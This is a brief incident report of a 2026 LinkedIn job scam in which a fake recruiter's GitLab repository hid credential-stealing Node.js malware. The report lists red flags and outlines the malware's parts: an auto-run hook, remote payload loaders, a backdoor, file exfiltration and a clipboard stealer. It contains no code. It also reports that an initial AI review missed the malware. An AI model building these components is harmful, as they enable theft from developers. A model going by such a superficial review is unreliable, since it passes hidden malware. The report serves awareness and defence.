On January 21, 2026, a LinkedIn message about a lucrative freelance opportunity led to a significant security breach. The sender, "Rajinder Mudhar," posed as a Branch Manager at a legitimate company but had a suspicious profile with 500+ connections and no posts. The message contained a link to a GitLab repository that appeared to host a real estate platform’s code. However, this was a front for malware embedded within a seemingly legitimate Node.js application, designed to steal credentials and establish a command-and-control connection. Several red flags indicated the scam. The LinkedIn profile had no activity despite a large number of connections, and the scheduled call with the supposed Tech Manager, Jack Murray, was a no-show. The GitLab repository had only two commits, which is atypical for production-ready software and suggested a deliberate attempt to conceal its history. An initial AI review deemed the app "good looking," failing to detect the hidden malware until a security-focused analysis was performed. The malicious code included an auto-execution hook and obfuscated loaders that fetched additional payloads from a remote server, allowing attackers to execute arbitrary commands and exfiltrate sensitive files. The malware had three main components: a command-and-control backdoor, a file exfiltration module, and a clipboard stealer. The backdoor connected to a remote server, allowing attackers to gather system information and execute commands. The file exfiltration module scanned for sensitive files on the system, while the clipboard stealer monitored and transmitted clipboard data to the attackers. The incident highlights the importance of scrutinizing LinkedIn profiles and code repositories for signs of malicious activity, especially in freelance engagements.